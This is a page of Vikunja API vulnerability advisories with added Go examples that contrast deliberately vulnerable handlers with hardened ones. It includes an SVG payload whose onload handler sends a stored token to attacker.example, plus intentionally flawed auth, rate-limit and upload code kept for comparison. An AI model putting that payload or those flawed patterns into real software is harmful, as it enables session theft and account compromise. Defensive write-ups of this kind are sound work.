code.vikunja.io/api vulnerabilities

32 known vulnerabilities affecting code.vikunja.io/api.

Total CVEs: 32
CISA KEV: 0
Public exploits: 0
Exploited in wild: 0
Severity breakdown: CRITICAL 2, HIGH 9, MEDIUM 21

Vulnerabilities

Page 2 of 2
CVE-2026-33315 | MEDIUM | affected versions: ≥ 0, ≤ 2.1.0 | 2026-03-20
CVE-2026-33315 [MEDIUM] CWE-288: Vikunja has a 2FA Bypass via Caldav Basic Auth. Summary: The Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. Details: The two files below show that when a user is accessing Caldav vi
Sources: GHSA, OSV
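The shape of the CalDAV problem, as an added example (this is not Vikunja's code): a password-only login path sits beside a TOTP-protected one. The `user` record, the `calDAVTokens` field and the plain sha256 hashing are assumptions made for this illustration; a real implementation uses a password KDF such as bcrypt or argon2id. Basic Auth cannot carry a TOTP code, so the hardened version refuses the account password for any 2FA-enab

led account on that path and accepts only a token issued specifically for CalDAV clients.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"errors"
	"fmt"
)

// Added example, not Vikunja's code. The user record and the per-client CalDAV token are
// assumptions for illustration; sha256 stands in for a real password KDF (bcrypt/argon2id).
type user struct {
	passHash     [32]byte
	totpEnabled  bool
	calDAVTokens [][32]byte // hashes of tokens issued specifically for CalDAV clients
}

var errBadCredentials = errors.New("invalid credentials")

func digest(s string) [32]byte { return sha256.Sum256([]byte(s)) }

func (u *user) passwordMatches(p string) bool {
	h := digest(p)
	return subtle.ConstantTimeCompare(h[:], u.passHash[:]) == 1
}

func (u *user) calDAVTokenMatches(t string) bool {
	h := digest(t)
	for _, k := range u.calDAVTokens {
		if subtle.ConstantTimeCompare(h[:], k[:]) == 1 {
			return true
		}
	}
	return false
}

// vulnerableBasicAuth is the pattern the advisory describes: Basic Auth carries only a
// username and password, the password is checked, and the TOTP step never happens, so a
// stolen password alone reaches data the second factor was meant to protect.
func vulnerableBasicAuth(u *user, password string) error {
	if u.passwordMatches(password) {
		return nil
	}
	return errBadCredentials
}

// hardenedBasicAuth keeps the second factor meaningful on a protocol that cannot prompt
// for it: an account with TOTP enabled may use this path only with a dedicated CalDAV
// token, never with its password. Both failures return the same error so the response
// does not reveal whether 2FA is enabled.
func hardenedBasicAuth(u *user, secret string) error {
	if u.calDAVTokenMatches(secret) {
		return nil
	}
	if u.totpEnabled {
		return errBadCredentials // even a correct password is refused here
	}
	if u.passwordMatches(secret) {
		return nil
	}
	return errBadCredentials
}

// demoUsers builds two constructed accounts: alice has 2FA plus a CalDAV token, bob has neither.
func demoUsers() (alice, bob *user) {
	alice = &user{passHash: digest("correct horse battery staple"), totpEnabled: true,
		calDAVTokens: [][32]byte{digest("caldav-token-for-alice-phone")}}
	bob = &user{passHash: digest("another long passphrase here")}
	return alice, bob
}

func main() {
	alice, bob := demoUsers()
	fmt.Println("vulnerable, alice's password:", vulnerableBasicAuth(alice, "correct horse battery staple"))
	fmt.Println("hardened, alice's password:  ", hardenedBasicAuth(alice, "correct horse battery staple"))
	fmt.Println("hardened, alice's token:     ", hardenedBasicAuth(alice, "caldav-token-for-alice-phone"))
	fmt.Println("hardened, bob's password:    ", hardenedBasicAuth(bob, "another long passphrase here"))
}
```

The same rule applies to any other non-interactive entry point (API tokens, WebDAV, IMAP-style clients): if a path cannot complete the second factor, it must not accept the primary password of an account that has one.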
CVE-2026-29794 | MEDIUM | affected versions: ≥ 0.8, < 2.2.0 | 2026-03-20
CVE-2026-29794 [MEDIUM] CWE-807: Vikunja has a Rate-Limit Bypass for Unauthenticated Users via Spoofed Headers. Summary: Unauthenticated users are able to bypass the application's built-in rate limits by spoofing the `X-Forwarded-For` or `X-Real-IP` headers, because the rate limit keys on the value of `(echo.Context).RealIP`. Details: In the first file below, the rate-limit for unauthenticated users can be obser
Sources: GHSA, OSV
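An added example of the bypass class and its fix, using only the standard library (this is not Vikunja's middleware and does not reproduce echo's `RealIP` internals; the trusted CIDR `10.0.0.0/8`, the peer addresses and the limit are assumptions). The naive resolver behaves the way the advisory describes: whatever the client writes into the header becomes the rate-limit key, so every request can pick a fresh key. The hardened resolver honours `X-Forwarded-For` only when the TCP peer is one of the operator's own proxies, and walks the header right to left so that a client-supplied prefix is ignored.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"strings"
)

// Added example, not Vikunja's middleware; trusted CIDRs and limits are assumptions.
// ipResolver honours X-Forwarded-For only when the TCP peer is one of our own proxies.
type ipResolver struct{ trusted []*net.IPNet }

func newIPResolver(cidrs ...string) *ipResolver {
	r := &ipResolver{}
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		r.trusted = append(r.trusted, n)
	}
	return r
}

func (r *ipResolver) isTrusted(ip net.IP) bool {
	for _, n := range r.trusted {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

func peerHost(req *http.Request) string {
	if host, _, err := net.SplitHostPort(req.RemoteAddr); err == nil {
		return host
	}
	return req.RemoteAddr
}

// naiveClientIP reproduces the bypass class in the advisory: whatever the client
// puts in X-Real-IP or X-Forwarded-For becomes the rate-limit key.
func naiveClientIP(req *http.Request) string {
	if v := req.Header.Get("X-Real-IP"); v != "" {
		return v
	}
	if v := req.Header.Get("X-Forwarded-For"); v != "" {
		return strings.TrimSpace(strings.Split(v, ",")[0])
	}
	return peerHost(req)
}

// clientIP walks X-Forwarded-For right to left, skipping our own proxies, and returns
// the first hop we did not append ourselves; an untrusted peer's header is ignored.
func (r *ipResolver) clientIP(req *http.Request) string {
	host := peerHost(req)
	if peer := net.ParseIP(host); peer == nil || !r.isTrusted(peer) {
		return host
	}
	hops := strings.Split(req.Header.Get("X-Forwarded-For"), ",")
	for i := len(hops) - 1; i >= 0; i-- {
		ip := net.ParseIP(strings.TrimSpace(hops[i]))
		if ip == nil {
			return host // empty or malformed header: fall back to the peer
		}
		if !r.isTrusted(ip) {
			return ip.String()
		}
	}
	return host // every hop was one of ours
}

// limiter is a per-key counter (single goroutine here; lock it in real code).
type limiter struct {
	max  int
	hits map[string]int
}

func (l *limiter) allow(key string) bool {
	l.hits[key]++
	return l.hits[key] <= l.max
}

func requestFrom(remoteAddr, xff string) *http.Request {
	req, _ := http.NewRequest("POST", "/api/v1/login", nil)
	req.RemoteAddr = remoteAddr
	req.Header.Set("X-Forwarded-For", xff)
	return req
}

// countAllowed sends n login attempts from one untrusted peer (203.0.113.5), each with a
// fresh spoofed X-Forwarded-For, and reports how many get past a limit of max.
func countAllowed(keyFn func(*http.Request) string, max, n int) int {
	lim := &limiter{max: max, hits: map[string]int{}}
	allowed := 0
	for i := 0; i < n; i++ {
		if lim.allow(keyFn(requestFrom("203.0.113.5:51000", fmt.Sprintf("198.51.100.%d", i%250+1)))) {
			allowed++
		}
	}
	return allowed
}

func main() {
	r := newIPResolver("10.0.0.0/8")
	fmt.Println("naive key, 50 attempts, limit 5:", countAllowed(naiveClientIP, 5, 50))
	fmt.Println("trusted-proxy key, same attack:", countAllowed(r.clientIP, 5, 50))
	fmt.Println("behind our proxy:", r.clientIP(requestFrom("10.1.2.3:443", "198.51.100.7, 10.0.0.9")))
}
```

If the application is deployed without a reverse proxy, the trusted list is empty and only `RemoteAddr` is ever used; the header must never be trusted by default.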
CVE-2026-33313 | MEDIUM | affected versions: ≥ 0, ≤ 2.1.0 | 2026-03-20
CVE-2026-33313 [MEDIUM] CWE-639: Vikunja has an IDOR in Task Comments that Allows Reading Arbitrary Comments. An authenticated user can read any task comment by ID, regardless of whether they have access to the task the comment belongs to, by substituting the task ID in the API URL with a task they do have access to. Details: The `GET /api/v1/tasks/{taskID}/comments/{commentID}` endpoint performs an authorization check against
Sources: GHSA, OSV
CVE-2026-33473 | MEDIUM (CVSS 5.7) | affected versions: ≥ 0.13 | 2026-03-20
CVE-2026-33473 [MEDIUM] CWE-287: Vikunja has TOTP Reuse During Validity Window. Summary: Any user that has enabled 2FA can have their TOTP reused during the standard 30-second validity window. Details: The code below is called when a user that has 2FA is authenticating to the application. Once they submit a valid username-password-totp combination, the user gets authenticated. If that same TOTP is used for the same user's account again within t
Sources: GHSA, OSV
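An added example of what "burn on use" looks like for TOTP, written against RFC 6238 with the standard library (this is not Vikunja's code; the 30-second step, 6 digits, one step of clock skew and the per-user `lastStep` map are assumptions for the illustration, and the secret is the RFC 4226 test vector, not a real key). The stateless check is a pure function of secret, code and time, so it accepts the same code as often as it is submitted inside the window; the stateful verifier records the highest time step each user has already consumed, which is exactly the requirement RFC 6238 section 5.2 places on a verifier.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
	"sync"
	"time"
)

// Added example, not Vikunja's code. RFC 6238 TOTP over HMAC-SHA1, 30-second steps,
// 6 digits, one step of clock skew accepted either side; the per-user "last consumed
// step" store is the state the advisory's description says is missing.
const (
	totpStep = 30 // seconds
	totpSkew = 1  // steps accepted on either side of the verifier's clock
)

// hotp implements RFC 4226 for a single counter value (6 digits).
func hotp(secret []byte, counter uint64) string {
	var msg [8]byte
	binary.BigEndian.PutUint64(msg[:], counter)
	mac := hmac.New(sha1.New, secret)
	mac.Write(msg[:])
	sum := mac.Sum(nil)
	off := int(sum[len(sum)-1] & 0x0f)
	code := binary.BigEndian.Uint32(sum[off:off+4]) & 0x7fffffff
	return fmt.Sprintf("%06d", code%1000000)
}

func totpAt(secret []byte, t time.Time) string {
	return hotp(secret, uint64(t.Unix()/totpStep))
}

func codeMatches(secret []byte, step int64, code string) bool {
	return hmac.Equal([]byte(hotp(secret, uint64(step))), []byte(code))
}

// verifyStateless is the flawed shape: with no memory of what was accepted, the same
// code passes every time it is presented inside the window.
func verifyStateless(secret []byte, code string, now time.Time) bool {
	step := now.Unix() / totpStep
	for d := int64(-totpSkew); d <= totpSkew; d++ {
		if codeMatches(secret, step+d, code) {
			return true
		}
	}
	return false
}

// verifier remembers the highest time step each user has authenticated with, so a
// replay of that step (or any earlier one) is refused. This is per user, not global.
type verifier struct {
	mu       sync.Mutex
	lastStep map[string]int64
}

func newVerifier() *verifier { return &verifier{lastStep: map[string]int64{}} }

func (v *verifier) verify(user string, secret []byte, code string, now time.Time) bool {
	step := now.Unix() / totpStep
	v.mu.Lock()
	defer v.mu.Unlock()
	used, seen := v.lastStep[user]
	for d := int64(-totpSkew); d <= totpSkew; d++ {
		s := step + d
		if seen && s <= used {
			continue // this step, or an older one, has already been consumed
		}
		if codeMatches(secret, s, code) {
			v.lastStep[user] = s
			return true
		}
	}
	return false
}

func main() {
	secret := []byte("12345678901234567890") // RFC 4226 test secret, not a real key
	now := time.Unix(59, 0)
	code := totpAt(secret, now)
	fmt.Println("code:", code)
	fmt.Println("stateless: first", verifyStateless(secret, code, now), "replay", verifyStateless(secret, code, now))
	v := newVerifier()
	fmt.Println("stateful:  first", v.verify("alice", secret, code, now), "replay", v.verify("alice", secret, code, now))
}
```

The stored step must live wherever login state lives (database or shared cache), not in process memory, or a multi-instance deployment reintroduces the replay window. The lock also closes the race of two simultaneous logins with the same code.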
CVE-2026-33312 | MEDIUM | affected versions: ≥ 0.20.2, < 2.2.0 | 2026-03-20
CVE-2026-33312 [MEDIUM] CWE-863: Vikunja read-only users can delete project background images via broken object-level authorization. Summary: The `DELETE /api/v1/projects/:project/background` endpoint checks `CanRead` permission instead of `CanUpdate`, allowing any user with read-only access to a project to permanently delete its background image. Details: The `RemoveProjectBackground` handle
Sources: GHSA, OSV
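One added example covers both authorization entries above, CVE-2026-33313 (comment not bound to the task that was authorized) and CVE-2026-33312 (a destructive action gated on read permission). It is not Vikunja's model code: the in-memory `store`, the `right` ladder, the user and object IDs and the sample data are constructed for the illustration; real code expresses the same checks in SQL. `vulnerableGetComment` authorizes the task ID from the URL and then loads the comment by its own ID alone, so any readable task unlocks every comment; `getComment` scopes the lookup to that task. `removeBackground` takes the required right as a parameter so the `CanRead` gate and the `CanUpdate` gate can be compared directly.

```go
package main

import (
	"errors"
	"fmt"
)

// Added example, not Vikunja's models. The in-memory store, the rights ladder and the
// sample data are constructed for illustration; real code expresses the same in SQL.
type right int

const (
	rightNone right = iota
	rightRead
	rightWrite
	rightAdmin
)

type project struct {
	background string
	members    map[string]right
}
type task struct{ projectID int64 }
type comment struct {
	taskID int64
	body   string
}
type store struct {
	projects map[int64]*project
	tasks    map[int64]*task
	comments map[int64]*comment
}

var (
	errForbidden = errors.New("forbidden")
	errNotFound  = errors.New("not found")
)

func (s *store) rightOnTask(user string, taskID int64) right {
	if t, ok := s.tasks[taskID]; ok {
		return s.projects[t.projectID].members[user]
	}
	return rightNone
}

// vulnerableGetComment mirrors CVE-2026-33313: the permission check uses the task ID from
// the URL, but the comment is then loaded by its own ID with no link back to that task,
// so any task the caller can read unlocks every comment ID in the database.
func (s *store) vulnerableGetComment(user string, taskID, commentID int64) (*comment, error) {
	if s.rightOnTask(user, taskID) < rightRead {
		return nil, errForbidden
	}
	c, ok := s.comments[commentID]
	if !ok {
		return nil, errNotFound
	}
	return c, nil
}

// getComment binds the child object to the parent that was authorized (in SQL:
// WHERE id = ? AND task_id = ?). A mismatch is a plain 404, which also avoids
// confirming that the comment exists.
func (s *store) getComment(user string, taskID, commentID int64) (*comment, error) {
	if s.rightOnTask(user, taskID) < rightRead {
		return nil, errForbidden
	}
	c, ok := s.comments[commentID]
	if !ok || c.taskID != taskID {
		return nil, errNotFound
	}
	return c, nil
}

// removeBackground deletes a project's background after requiring the given right.
// CVE-2026-33312 is the call with need = rightRead; the fix is need = rightWrite,
// because deleting is an update, not a read.
func (s *store) removeBackground(user string, projectID int64, need right) error {
	p, ok := s.projects[projectID]
	if !ok {
		return errNotFound
	}
	if p.members[user] < need {
		return errForbidden
	}
	p.background = ""
	return nil
}

// demoStore: alice administers project 1 and bob can only read it; project 2 is carol's alone.
func demoStore() *store {
	return &store{
		projects: map[int64]*project{
			1: {"bg-1.jpg", map[string]right{"alice": rightAdmin, "bob": rightRead}},
			2: {"bg-2.jpg", map[string]right{"carol": rightAdmin}},
		},
		tasks:    map[int64]*task{10: {1}, 20: {2}},
		comments: map[int64]*comment{100: {10, "public note"}, 200: {20, "carol's private comment"}},
	}
}

func main() {
	s := demoStore()
	c, err := s.vulnerableGetComment("bob", 10, 200)
	fmt.Printf("vulnerable: %v %v\n", err, c)
	c, err = s.getComment("bob", 10, 200)
	fmt.Printf("fixed: %v %v\n", err, c)
	fmt.Println("read-only delete with CanRead:", s.removeBackground("bob", 1, rightRead),
		"with CanUpdate:", s.removeBackground("bob", 1, rightWrite))
}
```

The general rule for every nested route of the form `/parent/{id}/child/{id}`: authorize the parent, then fetch the child with the parent ID as part of the key, never by the child ID alone.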
CVE-2026-33474 | MEDIUM | affected versions: ≥ 1.0.0-rc0, < 2.2.0 | 2026-03-20
CVE-2026-33474 [MEDIUM] CWE-400: Vikunja Affected by DoS via Image Preview Generation. Summary: Unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images. Affected code: decoding without bounds in task_attachment.go:GetPreview (../../tree/main/pkg/models/task_attachment.go#L219-L229); resizing path in resizeImage (../.
Sources: GHSA, OSV
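An added example of bounding the decode (not Vikunja's `GetPreview`): `image.DecodeConfig` parses only the header, so the declared dimensions can be checked against a pixel budget before `image.Decode` allocates anything. The budget of 25 million pixels, the `headerOnlyPNG` stand-in for the attacker's upload (a valid PNG signature plus an IHDR chunk claiming 100000x100000 pixels, 33 bytes on the wire) and the tiny benign image are all constructed for this illustration.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"hash/crc32"
	"image"
	"image/color"
	"image/png"

	_ "image/jpeg" // register the other decoder a preview path would accept
)

// Added example, not Vikunja's GetPreview. The pixel budget and the header-only PNG
// used as attacker input are constructed for illustration.
const maxPreviewPixels = 25_000_000 // about 5000x5000; size it to the memory one preview may use

var errImageTooLarge = errors.New("image dimensions exceed preview budget")

// checkDimensions parses only the image header, so it costs a few bytes of input and
// no pixel buffer, whatever the file claims to contain.
func checkDimensions(data []byte) (int, int, error) {
	cfg, _, err := image.DecodeConfig(bytes.NewReader(data))
	if err != nil {
		return 0, 0, err
	}
	if cfg.Width <= 0 || cfg.Height <= 0 || int64(cfg.Width)*int64(cfg.Height) > maxPreviewPixels {
		return cfg.Width, cfg.Height, errImageTooLarge
	}
	return cfg.Width, cfg.Height, nil
}

// decodeForPreview is the gated form of the unbounded decode the advisory describes:
// image.Decode allocates width*height pixels, so it runs only after the header passes
// the budget. The resize step should then operate on this already-bounded image.
func decodeForPreview(data []byte) (image.Image, error) {
	if _, _, err := checkDimensions(data); err != nil {
		return nil, err
	}
	img, _, err := image.Decode(bytes.NewReader(data))
	return img, err
}

// headerOnlyPNG builds a valid PNG signature plus IHDR chunk declaring w x h pixels.
// It stands in for the "highly compressed, extremely large-dimension" upload: tiny on
// disk, enormous once decoded.
func headerOnlyPNG(w, h uint32) []byte {
	ihdr := make([]byte, 13)
	binary.BigEndian.PutUint32(ihdr[0:4], w)
	binary.BigEndian.PutUint32(ihdr[4:8], h)
	ihdr[8], ihdr[9] = 8, 2 // 8-bit depth, truecolour (RGB); compression/filter/interlace 0
	chunk := append([]byte("IHDR"), ihdr...)
	var buf bytes.Buffer
	buf.Write([]byte{0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n'})
	binary.Write(&buf, binary.BigEndian, uint32(len(ihdr)))
	buf.Write(chunk)
	binary.Write(&buf, binary.BigEndian, crc32.ChecksumIEEE(chunk))
	return buf.Bytes()
}

// smallPNG encodes a real 4x4 image so the happy path is exercised as well.
func smallPNG() []byte {
	img := image.NewRGBA(image.Rect(0, 0, 4, 4))
	img.Set(1, 1, color.RGBA{R: 255, A: 255})
	var buf bytes.Buffer
	if err := png.Encode(&buf, img); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	hostile := headerOnlyPNG(100_000, 100_000) // 40 GB of RGBA if it were decoded
	w, h, err := checkDimensions(hostile)
	fmt.Printf("hostile upload: %d bytes on the wire, claims %dx%d, verdict: %v\n", len(hostile), w, h, err)
	_, err = decodeForPreview(smallPNG())
	fmt.Println("benign upload decoded:", err == nil)
}
```

Two further controls belong beside this check in a real service: a cap on the uploaded file size, and a limit on how many previews are generated concurrently, since even in-budget images cost CPU during resizing.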
CVE-2026-28268 | CRITICAL | affected versions: ≥ 0, ≤ 0.24.6 | 2026-02-28
CVE-2026-28268 [CRITICAL] CWE-459: Vikunja Vulnerable to Account Takeover via Password Reset Token Reuse. Summary: A critical business logic vulnerability exists in the password reset mechanism of vikunja/api that allows password reset tokens to be reused indefinitely. Due to a failure to invalidate tokens upon use and a critical logic bug in the token cleanup cron job, reset tokens remain valid forever. This allows an atta
Sources: GHSA, OSV
CVE-2026-27819 | HIGH | affected versions: ≥ 0, ≤ 0.24.6 | 2026-02-26
CVE-2026-27819 [HIGH] CWE-22: Vikunja has Path Traversal in CLI Restore. Summary: Path Traversal (Zip Slip) and Denial of Service (DoS) vulnerability discovered in the Vikunja CLI's restore functionality. Details: The restoreConfig function in vikunja/pkg/modules/dump/restore.go of the https://github.com/go-vikunja/vikunja/tree/main repository fails to sanitize file paths within the provided ZIP archive. A maliciously crafted ZIP can bypass the i
Sources: GHSA, OSV
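An added example of a restore routine that is safe against both halves of this entry, Zip Slip and oversized entries (this is not Vikunja's `restoreConfig`; the archives, the entry names and the 64 MiB per-file cap are constructed for the illustration). `safeJoin` resolves each entry under the destination and rejects anything that would land outside it; `extract` validates every name before writing a single byte, so a hostile entry anywhere in the archive leaves the destination untouched, and then copies each file through a `LimitReader` because the size field in the zip header is attacker-controlled.

```go
package main

import (
	"archive/zip"
	"bytes"
	"errors"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// Added example, not Vikunja's restore code; the archives and the size cap are constructed.
const maxEntryBytes = 64 << 20 // per-file cap; the header's own size field is attacker-controlled

var (
	errTraversal = errors.New("zip entry escapes the destination directory")
	errTooLarge  = errors.New("zip entry exceeds size limit")
)

// safeJoin resolves an entry name under dest and rejects anything that would land
// outside it ("../x", "a/../../x"). Absolute names are treated as relative to dest.
func safeJoin(dest, name string) (string, error) {
	dest = filepath.Clean(dest)
	target := filepath.Join(dest, filepath.FromSlash(name))
	rel, err := filepath.Rel(dest, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errTraversal
	}
	return target, nil
}

// extract validates every name before writing anything, then copies under a hard byte cap.
func extract(archive []byte, dest string) error {
	zr, err := zip.NewReader(bytes.NewReader(archive), int64(len(archive)))
	if err != nil {
		return err // includes zip.ErrInsecurePath when GODEBUG=zipinsecurepath=0
	}
	targets := make([]string, len(zr.File))
	for i, f := range zr.File {
		if targets[i], err = safeJoin(dest, f.Name); err != nil {
			return fmt.Errorf("%q: %w", f.Name, err)
		}
	}
	for i, f := range zr.File {
		if f.FileInfo().IsDir() {
			if err := os.MkdirAll(targets[i], 0o755); err != nil {
				return err
			}
			continue
		}
		if err := writeEntry(f, targets[i]); err != nil {
			return fmt.Errorf("%q: %w", f.Name, err)
		}
	}
	return nil
}

func writeEntry(f *zip.File, target string) error {
	rc, err := f.Open()
	if err != nil {
		return err
	}
	defer rc.Close()
	if err := os.MkdirAll(filepath.Dir(target), 0o755); err != nil {
		return err
	}
	out, err := os.OpenFile(target, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0o644)
	if err != nil {
		return err
	}
	defer out.Close()
	n, err := io.Copy(out, io.LimitReader(rc, maxEntryBytes+1)) // count what actually inflates
	if err == nil && n > maxEntryBytes {
		err = errTooLarge
	}
	return err
}

// buildZip writes an in-memory archive with the names given verbatim, as an attacker would.
func buildZip(entries map[string]string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range entries {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		w.Write([]byte(body))
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	dest, _ := os.MkdirTemp("", "restore-")
	defer os.RemoveAll(dest)
	fmt.Println("benign:", extract(buildZip(map[string]string{"config.yml": "a: 1\n"}), dest))
	fmt.Println("hostile:", extract(buildZip(map[string]string{"config.yml": "x", "../../escape.txt": "pwned"}), dest))
}
```

Symlink entries are not created here at all, which sidesteps the other classic escape (a symlink pointing outside the tree followed by a file written through it). On Go 1.20 and later `filepath.IsLocal(name)` expresses the name check directly.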
CVE-2026-27575 | CRITICAL | affected versions: ≥ 0, ≤ 0.24.6 | 2026-02-25
CVE-2026-27575 [CRITICAL] CWE-521: Vikunja has Weak Password Policy Combined with Persistent Sessions After Password Change. Summary: The application allows users to set weak passwords (e.g., 1234, password) without enforcing minimum strength requirements. Additionally, active sessions remain valid after a user changes their password. An attacker who compromises an account (via brute-force or credential
Sources: GHSA, OSV
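One added example serves the two credential-lifecycle entries above, CVE-2026-28268 (reset tokens never consumed) and CVE-2026-27575 (weak passwords accepted, sessions outliving a password change). It is not Vikunja's auth code: the store layout, the 12-character minimum, the one-hour reset validity and the `authEpoch` counter are assumptions for the illustration, sha256 stands in for a real password KDF, sessions are represented as values the way a JWT claim would carry them, and a real store needs locking. The reset path deletes the token before anything else changes, so a replay fails even if a cleanup job never runs, and every password change increments the account's epoch, which makes sessions issued under the old password stop validating.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"time"
)

// Added example, not Vikunja's auth code: store layout, 12-character minimum and one-hour
// reset validity are assumptions; sha256 stands in for a real KDF; a real store needs locking.
const resetTTL, minPassword = time.Hour, 12

var (
	errBadToken = errors.New("reset token invalid or expired")
	errWeakPass = errors.New("password too short or equal to the username")
)

type account struct {
	passHash  [32]byte
	authEpoch uint64 // bumped on every credential change
}

// session is what a login hands out; in practice the epoch travels as a JWT claim.
type session struct {
	user  string
	epoch uint64 // authEpoch when issued; a mismatch means "log in again"
}
type resetToken struct {
	user    string
	expires time.Time
}
type auth struct {
	accounts map[string]*account
	resets   map[string]*resetToken
}

func newAuth() *auth { return &auth{map[string]*account{}, map[string]*resetToken{}} }

func randomID() string {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return hex.EncodeToString(b)
}

func checkPassword(user, pw string) error {
	if len(pw) < minPassword || pw == user {
		return errWeakPass // in practice also screen against a breached-password list
	}
	return nil
}

func (a *auth) register(user, pw string) error {
	if err := checkPassword(user, pw); err != nil {
		return err
	}
	a.accounts[user] = &account{sha256.Sum256([]byte(pw)), 1}
	return nil
}

// newSession stands in for a successful login of an existing user.
func (a *auth) newSession(user string) session { return session{user, a.accounts[user].authEpoch} }

func (a *auth) sessionValid(s session) bool {
	acc := a.accounts[s.user]
	return acc != nil && acc.authEpoch == s.epoch
}

func (a *auth) issueReset(user string, now time.Time) string {
	tok := randomID()
	a.resets[tok] = &resetToken{user, now.Add(resetTTL)}
	return tok
}

// resetPassword closes both reported gaps: the token is deleted before anything changes,
// and the epoch bump invalidates every session issued under the old password.
func (a *auth) resetPassword(tok, newPw string, now time.Time) error {
	r := a.resets[tok]
	if r == nil || now.After(r.expires) || a.accounts[r.user] == nil {
		return errBadToken
	}
	if err := checkPassword(r.user, newPw); err != nil {
		return err
	}
	delete(a.resets, tok)
	acc := a.accounts[r.user]
	acc.passHash, acc.authEpoch = sha256.Sum256([]byte(newPw)), acc.authEpoch+1
	return nil
}

func main() {
	a, now := newAuth(), time.Now()
	a.register("alice", "correct horse battery staple")
	s := a.newSession("alice")
	tok := a.issueReset("alice", now)
	fmt.Println("reset:", a.resetPassword(tok, "a much longer passphrase", now),
		"replay:", a.resetPassword(tok, "a much longer passphrase", now), "old session valid:", a.sessionValid(s))
}
```

A periodic cleanup of expired tokens is still useful for table hygiene, but correctness must not depend on it: the delete on use is what closes the replay, and the epoch check is what closes the session.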
CVE-2026-27616 | HIGH | affected versions: ≥ 0, ≤ 0.24.6 | 2026-02-25
CVE-2026-27616 [HIGH] CWE-79: Vikunja: Stored XSS via Unsanitized SVG Attachment Upload Leads to Token Exposure. Details: The application allows users to upload SVG files as task attachments. SVG is an XML-based format that supports JavaScript execution through elements such as `<script>` tags or event handlers like `onload`. The application does not sanitize SVG content before storing it. When the uploaded SVG file is acces
Sources: GHSA, OSV
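An added example of the response headers that keep an uploaded SVG from executing in the application's origin (this is not Vikunja's attachment handler; the `attachments` map, the route shape and the hostile SVG body are constructed for the illustration). The vulnerable handler echoes the uploader-declared content type and serves the bytes inline, so a browser that opens the URL renders the SVG as a document of the app's origin and runs its `onload`. The hardened handler forces a download with a neutral content type, forbids MIME sniffing, and adds a sandboxed CSP so that a client which renders the body anyway gets neither script nor origin.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"path"
)

// Added example, not Vikunja's attachment handler. The store and the hostile SVG are
// constructed for illustration.
type attachment struct {
	name         string
	declaredMIME string // whatever the uploading client sent; attacker-controlled
	body         []byte
}

var attachments = map[string]attachment{
	"7": {
		name:         "diagram.svg",
		declaredMIME: "image/svg+xml",
		body:         []byte(`<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://attacker.example/?t='+localStorage.getItem('token'))"/>`),
	},
}

// vulnerableServe trusts the stored content type and serves the bytes inline, so the
// SVG is rendered as a document in the application's origin and its script runs with
// access to the app's storage and cookies.
func vulnerableServe(w http.ResponseWriter, r *http.Request) {
	a, ok := attachments[path.Base(r.URL.Path)]
	if !ok {
		http.NotFound(w, r)
		return
	}
	w.Header().Set("Content-Type", a.declaredMIME)
	w.Write(a.body)
}

// hardenedServe never lets an upload execute in the app origin: force a download with a
// neutral type, forbid sniffing, and sandbox whatever still gets rendered.
func hardenedServe(w http.ResponseWriter, r *http.Request) {
	a, ok := attachments[path.Base(r.URL.Path)]
	if !ok {
		http.NotFound(w, r)
		return
	}
	disposition := mime.FormatMediaType("attachment", map[string]string{"filename": path.Base(a.name)})
	if disposition == "" {
		disposition = "attachment" // filename not representable; drop it rather than risk header injection
	}
	h := w.Header()
	h.Set("Content-Type", "application/octet-stream")
	h.Set("Content-Disposition", disposition)
	h.Set("X-Content-Type-Options", "nosniff")
	h.Set("Content-Security-Policy", "default-src 'none'; sandbox")
	h.Set("Cache-Control", "private, no-store")
	w.Write(a.body)
}

// respond runs a handler against a recorder and returns the response for inspection.
func respond(handler http.HandlerFunc, id string) *http.Response {
	rec := httptest.NewRecorder()
	handler(rec, httptest.NewRequest("GET", "/api/v1/tasks/1/attachments/"+id, nil))
	return rec.Result()
}

func main() {
	for name, h := range map[string]http.HandlerFunc{"vulnerable": vulnerableServe, "hardened": hardenedServe} {
		res := respond(h, "7")
		fmt.Printf("%-10s Content-Type=%q Content-Disposition=%q CSP=%q\n", name,
			res.Header.Get("Content-Type"), res.Header.Get("Content-Disposition"), res.Header.Get("Content-Security-Policy"))
	}
}
```

Where inline display of user images is a product requirement, serve them from a separate origin (a dedicated attachments host) so that any script that does run has no access to the application's session; sanitizing SVG is a weaker third option because the format's attack surface is large.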
CVE-2026-27116 | MEDIUM | affected versions: ≥ 0, ≤ 0.24.6 | 2026-02-25
CVE-2026-27116 [MEDIUM] CWE-116: Vikunja has Reflected HTML Injection via filter Parameter in its Projects Module. Summary: Vikunja (https://github.com/go-vikunja/vikunja) is an open-source self-hosted task management platform with 3,300+ GitHub stars. A reflected HTML injection vulnerability exists in the Projects module where the `filter` URL parameter is rendered into the DOM without output encoding when the u
Sources: GHSA, OSV
CVE-2026-25935 | HIGH | affected versions: ≥ 0, ≤ 0.24.6 | 2026-02-11
